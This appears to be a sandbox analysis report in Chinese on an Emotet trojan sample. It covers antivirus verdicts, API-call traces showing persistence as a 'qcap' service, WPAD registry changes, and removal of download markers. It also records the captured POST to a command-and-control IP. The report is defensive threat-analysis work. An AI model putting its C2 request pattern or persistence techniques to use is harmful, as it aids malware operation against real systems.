10.2
0-day
48 个模型检测该样本为恶意!
重新分析
更多

103a85c0dd442761afed6126d516f296998464568883728bc39cdf19b8be4fe3

c1df9c0e1efab1223ba123d6076f48cb.exe

分析耗时

105s

最近分析

文件大小

312.0KB
静态报毒 动态报毒 100% AI SCORE=82 AIDETECTVM BEHAVIOR CLASSIC CONFIDENCE ELDORADO EMOTET G4PFV7ILRZW GENERICKDZ GENETIC HFOR HIGH CONFIDENCE HSFKDY KRYPTIK MALWARE1 MALWARE@#27860ET3KPYX0 NVUKU R348330 S15483016 UNSAFE WOREFLINTPMF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Emotet-FRV!C1DF9C0E1EFA 20201024 6.0.6.653
Alibaba Trojan:Win32/Emotet.ec9c6cd5 20190527 0.3.0.5
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Baidu 20190318 1.0.0.2
Avast Win32:Malware-gen 20201024 18.4.3895.0
Kingsoft 20201024 2013.8.14.323
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619875141.245374
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (5 个事件)
Time & API Arguments Status Return Repeated
1619875127.933374
CryptGenKey
crypto_handle: 0x00584508
algorithm_identifier: 0x0000660e ()
provider_handle: 0x00583b48
flags: 1
key: f±ÈèÙ½^äo+m>Ȩ
success 1 0
1619875141.261374
CryptExportKey
crypto_handle: 0x00584508
crypto_export_handle: 0x00583c10
buffer: f¤º—Qh“’Cw ?ï¶å²Þ0 :Ë,$šUfQ!§©&¨xEÿÒîã­+s²—ba8X~|¡‰Bs˜X¹'i£ÿÑ+°½ 1|žb£bz<%ÙØ
blob_type: 1
flags: 64
success 1 0
1619875149.245374
CryptExportKey
crypto_handle: 0x00584508
crypto_export_handle: 0x00583c10
buffer: f¤ž ËÝ=¿£ŽlNKênj‹­QMm ¤\m¾Â mõ ¿´÷‹í„Á0GRj+á´Ôi`!0€˜-äÆW˽}¦µXªŽ¡¡aŽ—À¹Ú.7_:¿ï5†Pi(
blob_type: 1
flags: 64
success 1 0
1619875153.089374
CryptExportKey
crypto_handle: 0x00584508
crypto_export_handle: 0x00583c10
buffer: f¤1V{ÃüLëHSþîԛz€ZrÁ:ê¥YÿpätðÁK–é®Fª(=Ł!ÈDÀ ˆ©Í®~O2vå³ë€«»®(ßtû ˜‹B§ýŠ=Fí‰=kèu³ +Ž}
blob_type: 1
flags: 64
success 1 0
1619875177.605374
CryptExportKey
crypto_handle: 0x00584508
crypto_export_handle: 0x00583c10
buffer: f¤€àµeKö5ö©Š§7›ï Ð¿¢#´ì®D"Vƒ~fJ<Ùu)&Ër Ê`ì¾³pCŠEE:ÎiÁõĤf0|{¥4Ô1ädºR]Eb“ãâù1º ß¼ÐH¥…ê’ÎZzxs
blob_type: 1
flags: 64
success 1 0
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 个事件)
suspicious_features Connection to IP address suspicious_request POST http://45.173.88.33/Zi6xxjqq/1EKUIiSQ/Z5fhapNIPwR5JUpE/qkvqymH0UiNc/LzkFkBugZpEu/
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:3041311063&cup2hreq=71da7f85c9dae73ee52a00dcfd4d3f83e3cef1777e38012892c23e4aac0b416f
Performs some HTTP requests (5 个事件)
request POST http://45.173.88.33/Zi6xxjqq/1EKUIiSQ/Z5fhapNIPwR5JUpE/qkvqymH0UiNc/LzkFkBugZpEu/
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619845937&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=5532f415003a9473&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619845937&mv=m
request POST https://update.googleapis.com/service/update2?cup2key=10:3041311063&cup2hreq=71da7f85c9dae73ee52a00dcfd4d3f83e3cef1777e38012892c23e4aac0b416f
Sends data using the HTTP POST Method (2 个事件)
request POST http://45.173.88.33/Zi6xxjqq/1EKUIiSQ/Z5fhapNIPwR5JUpE/qkvqymH0UiNc/LzkFkBugZpEu/
request POST https://update.googleapis.com/service/update2?cup2key=10:3041311063&cup2hreq=71da7f85c9dae73ee52a00dcfd4d3f83e3cef1777e38012892c23e4aac0b416f
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619861597.906
NtAllocateVirtualMemory
process_identifier: 1464
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00510000
success 0 0
1619875188.308
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00000000040b0000
success 0 0
1619875127.573374
NtAllocateVirtualMemory
process_identifier: 2444
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01d90000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Foreign language identified in PE resource (7 个事件)
name RT_ICON language LANG_CHINESE offset 0x00043e70 filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000468
name RT_ICON language LANG_CHINESE offset 0x00043e70 filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000468
name RT_ICON language LANG_CHINESE offset 0x00043e70 filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000468
name RT_ICON language LANG_CHINESE offset 0x00043e70 filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000468
name RT_ICON language LANG_CHINESE offset 0x00043e70 filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000468
name RT_RCDATA language LANG_CHINESE offset 0x00044328 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00008546
name RT_GROUP_ICON language LANG_CHINESE offset 0x000442d8 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x0000004c
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1619861598.61
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\c1df9c0e1efab1223ba123d6076f48cb.exe
newfilepath: C:\Windows\SysWOW64\HOSTNAME\qcap.exe
newfilepath_r: C:\Windows\SysWOW64\HOSTNAME\qcap.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\c1df9c0e1efab1223ba123d6076f48cb.exe
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619875141.730374
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 个事件)
process qcap.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1619875141.448374
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (5 个事件)
host 172.217.24.14
host 190.163.31.26
host 209.126.6.222
host 45.173.88.33
host 5.153.250.14
Installs itself for autorun at Windows startup (1 个事件)
service_name qcap service_path C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\HOSTNAME\qcap.exe"
Created a service where a service was also not started (1 个事件)
Time & API Arguments Status Return Repeated
1619861600.594
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x02af46a0
display_name: qcap
error_control: 0
service_name: qcap
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\HOSTNAME\qcap.exe"
filepath_r: "C:\Windows\SysWOW64\HOSTNAME\qcap.exe"
service_manager_handle: 0x02ae59c0
desired_access: 2
service_type: 16
password:
success 45041312 0
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 个事件)
Time & API Arguments Status Return Repeated
1619875145.198374
RegSetValueExA
key_handle: 0x000003a4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619875145.198374
RegSetValueExA
key_handle: 0x000003a4
value: à`L5v>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619875145.198374
RegSetValueExA
key_handle: 0x000003a4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619875145.198374
RegSetValueExW
key_handle: 0x000003a4
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619875145.198374
RegSetValueExA
key_handle: 0x000003bc
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619875145.198374
RegSetValueExA
key_handle: 0x000003bc
value: à`L5v>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619875145.214374
RegSetValueExA
key_handle: 0x000003bc
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619875145.245374
RegSetValueExW
key_handle: 0x000003a0
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619875145.980374
RegSetValueExA
key_handle: 0x000003a4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619875145.980374
RegSetValueExA
key_handle: 0x000003a4
value: À³Ã5v>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619875145.980374
RegSetValueExA
key_handle: 0x000003a4
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619875145.980374
RegSetValueExW
key_handle: 0x000003a4
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619875145.995374
RegSetValueExA
key_handle: 0x000003c4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619875145.995374
RegSetValueExA
key_handle: 0x000003c4
value: À³Ã5v>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619875145.995374
RegSetValueExA
key_handle: 0x000003c4
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Attempts to remove evidence of file being downloaded from the Internet (1 个事件)
file C:\Windows\SysWOW64\HOSTNAME\qcap.exe:Zone.Identifier
File has been identified by 48 AntiVirus engines on VirusTotal as malicious (48 个事件)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.69540
FireEye Trojan.GenericKDZ.69540
CAT-QuickHeal Trojan.WoreflintPMF.S15483016
McAfee Emotet-FRV!C1DF9C0E1EFA
Cylance Unsafe
K7AntiVirus Trojan ( 0056e07b1 )
Alibaba Trojan:Win32/Emotet.ec9c6cd5
K7GW Trojan ( 0056e07b1 )
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Trojan.Generic.D10FA4
Cyren W32/Emotet.AQG.gen!Eldorado
Symantec Trojan.Emotet
APEX Malicious
Paloalto generic.ml
ClamAV Win.Malware.Emotet-9641869-0
Kaspersky HEUR:Backdoor.Win32.Emotet.vho
BitDefender Trojan.GenericKDZ.69540
NANO-Antivirus Trojan.Win32.Emotet.hsfkdy
Avast Win32:Malware-gen
Ad-Aware Trojan.GenericKDZ.69540
Comodo Malware@#27860et3kpyx0
DrWeb Trojan.Emotet.999
VIPRE Trojan.Win32.Generic!BT
Invincea Troj/Emotet-CLF
McAfee-GW-Edition BehavesLike.Win32.Emotet.fh
Sophos Troj/Emotet-CLF
Ikarus Trojan-Banker.Emotet
Jiangmin Backdoor.Emotet.rq
Webroot W32.Malware.Gen
Avira TR/AD.Emotet.nvuku
Microsoft Trojan:Win32/Emotet.ARJ!MTB
ViRobot Trojan.Win32.Emotet.319488.F
ZoneAlarm HEUR:Backdoor.Win32.Emotet.vho
GData Trojan.GenericKDZ.69540
TACHYON Trojan/W32.Agent.319488.ALO
AhnLab-V3 Trojan/Win32.Agent.R348330
VBA32 Trojan.Emotet
ALYac Trojan.Agent.Emotet
MAX malware (ai score=82)
ESET-NOD32 a variant of Win32/Kryptik.HFOR
Rising Trojan.Kryptik!1.CAD5 (CLASSIC)
Yandex Trojan.Kryptik!G4pfV7ILrzw
Fortinet W32/Malicious_Behavior.VEX
AVG Win32:Malware-gen
Panda Trj/Genetic.gen
Qihoo-360 Win32/Backdoor.2a1
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (6 个事件)
dead_host 172.217.24.14:443
dead_host 209.126.6.222:8080
dead_host 192.168.56.101:49182
dead_host 5.153.250.14:8080
dead_host 172.217.160.78:443
dead_host 190.163.31.26:80
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-08-18 04:49:19

Imports

Library KERNEL32.dll:
0x42b0b4 HeapFree
0x42b0b8 HeapAlloc
0x42b0bc VirtualAlloc
0x42b0c0 HeapReAlloc
0x42b0c4 GetCommandLineA
0x42b0c8 GetProcessHeap
0x42b0cc GetStartupInfoA
0x42b0d0 RaiseException
0x42b0d4 RtlUnwind
0x42b0d8 HeapSize
0x42b0dc TerminateProcess
0x42b0e8 IsDebuggerPresent
0x42b0ec GetACP
0x42b0f0 LCMapStringA
0x42b0f4 LCMapStringW
0x42b0f8 Sleep
0x42b0fc HeapDestroy
0x42b100 HeapCreate
0x42b104 VirtualFree
0x42b108 GetStdHandle
0x42b11c SetHandleCount
0x42b120 GetFileType
0x42b128 GetTickCount
0x42b130 GetStringTypeA
0x42b134 GetStringTypeW
0x42b138 GetConsoleCP
0x42b13c GetConsoleMode
0x42b140 SetStdHandle
0x42b144 WriteConsoleA
0x42b148 GetConsoleOutputCP
0x42b14c WriteConsoleW
0x42b150 SetErrorMode
0x42b154 CreateFileA
0x42b158 GetCurrentProcess
0x42b15c FlushFileBuffers
0x42b160 SetFilePointer
0x42b164 WriteFile
0x42b168 ReadFile
0x42b170 GetThreadLocale
0x42b174 GetOEMCP
0x42b178 GetCPInfo
0x42b180 TlsFree
0x42b188 LocalReAlloc
0x42b18c TlsSetValue
0x42b190 TlsAlloc
0x42b198 GlobalHandle
0x42b19c GlobalReAlloc
0x42b1a4 TlsGetValue
0x42b1ac LocalAlloc
0x42b1b0 GlobalFlags
0x42b1b8 GetModuleFileNameW
0x42b1bc GetCurrentProcessId
0x42b1c0 GetCurrentThread
0x42b1c8 GetModuleFileNameA
0x42b1d0 GetLocaleInfoA
0x42b1d4 lstrcmpA
0x42b1d8 GlobalFree
0x42b1dc GlobalAlloc
0x42b1e0 FormatMessageA
0x42b1e4 LocalFree
0x42b1e8 CloseHandle
0x42b1ec FreeResource
0x42b1f0 GetCurrentThreadId
0x42b1f4 GlobalGetAtomNameA
0x42b1f8 GlobalAddAtomA
0x42b1fc GlobalFindAtomA
0x42b200 GlobalDeleteAtom
0x42b204 FreeLibrary
0x42b208 LoadLibraryA
0x42b20c lstrcmpW
0x42b210 GetVersionExA
0x42b214 GlobalLock
0x42b218 GlobalUnlock
0x42b21c MulDiv
0x42b220 GetModuleHandleA
0x42b224 GetProcAddress
0x42b228 SetLastError
0x42b22c GetVersion
0x42b230 CompareStringA
0x42b234 GetLastError
0x42b238 InterlockedExchange
0x42b23c MultiByteToWideChar
0x42b240 lstrlenA
0x42b244 ExitProcess
0x42b248 FindResourceA
0x42b24c LoadResource
0x42b250 LockResource
0x42b254 SizeofResource
0x42b258 WideCharToMultiByte
Library USER32.dll:
0x42b28c SetCursor
0x42b290 GetDesktopWindow
0x42b298 GetNextDlgTabItem
0x42b29c EndDialog
0x42b2a0 PostQuitMessage
0x42b2a4 SetMenuItemBitmaps
0x42b2ac LoadBitmapA
0x42b2b0 ModifyMenuA
0x42b2b4 EnableMenuItem
0x42b2b8 CheckMenuItem
0x42b2bc GetMenuState
0x42b2c0 GetMessageA
0x42b2c4 TranslateMessage
0x42b2c8 GetActiveWindow
0x42b2cc ValidateRect
0x42b2d0 ShowWindow
0x42b2d4 MoveWindow
0x42b2d8 IsDialogMessageA
0x42b2dc WindowFromPoint
0x42b2e0 IsWindowEnabled
0x42b2e8 SendDlgItemMessageA
0x42b2ec WinHelpA
0x42b2f0 SetWindowsHookExA
0x42b2f4 CallNextHookEx
0x42b2f8 GetClassLongA
0x42b2fc GetClassNameA
0x42b300 SetPropA
0x42b304 GetPropA
0x42b308 RemovePropA
0x42b30c SetFocus
0x42b314 GetForegroundWindow
0x42b318 SetActiveWindow
0x42b31c DispatchMessageA
0x42b320 GetDlgItem
0x42b324 GetTopWindow
0x42b328 DestroyWindow
0x42b32c UnhookWindowsHookEx
0x42b330 GetMessageTime
0x42b334 GetMessagePos
0x42b338 PeekMessageA
0x42b33c MapWindowPoints
0x42b340 GetKeyState
0x42b344 SetForegroundWindow
0x42b348 IsWindowVisible
0x42b34c UpdateWindow
0x42b350 GetMenu
0x42b354 GetSubMenu
0x42b358 GetMenuItemID
0x42b35c GetMenuItemCount
0x42b360 MessageBoxA
0x42b364 CreateWindowExA
0x42b368 GetClassInfoExA
0x42b36c GetClassInfoA
0x42b370 RegisterClassA
0x42b374 AdjustWindowRectEx
0x42b378 CopyRect
0x42b37c GetDlgCtrlID
0x42b380 DefWindowProcA
0x42b384 CallWindowProcA
0x42b388 IsWindow
0x42b38c RedrawWindow
0x42b390 SetTimer
0x42b394 GetSysColor
0x42b398 OffsetRect
0x42b39c KillTimer
0x42b3a0 GetWindowLongA
0x42b3a4 SetWindowLongA
0x42b3a8 SetWindowPos
0x42b3b0 GetWindowPlacement
0x42b3b4 GetWindowRect
0x42b3b8 GetWindow
0x42b3bc EndPaint
0x42b3c0 BeginPaint
0x42b3c4 ReleaseDC
0x42b3c8 GetDC
0x42b3cc UnregisterClassA
0x42b3d0 LoadCursorA
0x42b3d4 GetSysColorBrush
0x42b3d8 DestroyMenu
0x42b3e0 GetWindowTextA
0x42b3e4 PtInRect
0x42b3e8 SetCapture
0x42b3ec GetCapture
0x42b3f0 ReleaseCapture
0x42b3f4 InflateRect
0x42b3f8 GetCursorPos
0x42b3fc GetFocus
0x42b400 SetWindowTextA
0x42b404 SendMessageA
0x42b408 GetParent
0x42b40c IsRectEmpty
0x42b410 GetClientRect
0x42b414 PostMessageA
0x42b418 EnableWindow
0x42b41c LoadIconA
0x42b420 GetSystemMenu
0x42b424 AppendMenuA
0x42b428 IsIconic
0x42b42c ClientToScreen
0x42b430 ScreenToClient
0x42b434 GrayStringA
0x42b438 DrawTextExA
0x42b43c DrawTextA
0x42b440 TabbedTextOutA
0x42b444 DrawIcon
0x42b448 GetSystemMetrics
0x42b44c GetLastActivePopup
Library GDI32.dll:
0x42b028 SetWindowExtEx
0x42b02c ScaleWindowExtEx
0x42b030 DeleteDC
0x42b034 CreateBitmap
0x42b038 GetStockObject
0x42b03c ScaleViewportExtEx
0x42b040 GetDeviceCaps
0x42b044 SetViewportExtEx
0x42b048 OffsetViewportOrgEx
0x42b04c SetViewportOrgEx
0x42b050 SelectObject
0x42b054 Escape
0x42b058 ExtTextOutA
0x42b05c TextOutA
0x42b060 RectVisible
0x42b064 PtVisible
0x42b068 GetObjectA
0x42b06c DeleteObject
0x42b070 MoveToEx
0x42b074 LineTo
0x42b078 GetClipBox
0x42b07c SetMapMode
0x42b080 SetTextColor
0x42b084 SetBkMode
0x42b088 SetBkColor
0x42b08c RestoreDC
0x42b090 SaveDC
0x42b098 CreateCompatibleDC
0x42b0a0 CreatePen
0x42b0a4 BitBlt
0x42b0a8 SetPixel
0x42b0ac GetCurrentObject
Library WINSPOOL.DRV:
0x42b454 ClosePrinter
0x42b458 DocumentPropertiesA
0x42b45c OpenPrinterA
Library ADVAPI32.dll:
0x42b000 RegSetValueExA
0x42b004 RegCreateKeyExA
0x42b008 RegQueryValueA
0x42b00c RegEnumKeyA
0x42b010 RegDeleteKeyA
0x42b014 RegOpenKeyExA
0x42b018 RegQueryValueExA
0x42b01c RegOpenKeyA
0x42b020 RegCloseKey
Library SHELL32.dll:
0x42b274 SHGetMalloc
0x42b278 SHBrowseForFolderA
Library SHLWAPI.dll:
0x42b280 PathFindFileNameA
0x42b284 PathFindExtensionA
Library OLEAUT32.dll:
0x42b260 VariantClear
0x42b264 VariantChangeType
0x42b268 VariantInit

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49193 113.108.239.194 r1---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49194 113.108.239.196 r3---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49192 203.208.41.33 redirector.gvt1.com 80
192.168.56.101 49191 203.208.41.98 update.googleapis.com 443
192.168.56.101 49181 45.173.88.33 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 51378 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 54260 114.114.114.114 53
192.168.56.101 54991 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 60088 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 60221 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57236 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 58970 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: redirector.gvt1.com
http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=5532f415003a9473&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619845937&mv=m 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=5532f415003a9473&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619845937&mv=m HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r3---sn-j5o7dn7e.gvt1.com
http://45.173.88.33/Zi6xxjqq/1EKUIiSQ/Z5fhapNIPwR5JUpE/qkvqymH0UiNc/LzkFkBugZpEu/ 
POST /Zi6xxjqq/1EKUIiSQ/Z5fhapNIPwR5JUpE/qkvqymH0UiNc/LzkFkBugZpEu/ HTTP/1.1
Referer: http://45.173.88.33/Zi6xxjqq/1EKUIiSQ/Z5fhapNIPwR5JUpE/qkvqymH0UiNc/LzkFkBugZpEu/
Content-Type: multipart/form-data; boundary=---------------------------460181788733198
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 45.173.88.33
Content-Length: 4516
Connection: Keep-Alive
Cache-Control: no-cache
http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619845937&mv=m&mvi=1&pl=23&shardbypass=yes 
HEAD /edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619845937&mv=m&mvi=1&pl=23&shardbypass=yes HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: r1---sn-j5o7dn7e.gvt1.com

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.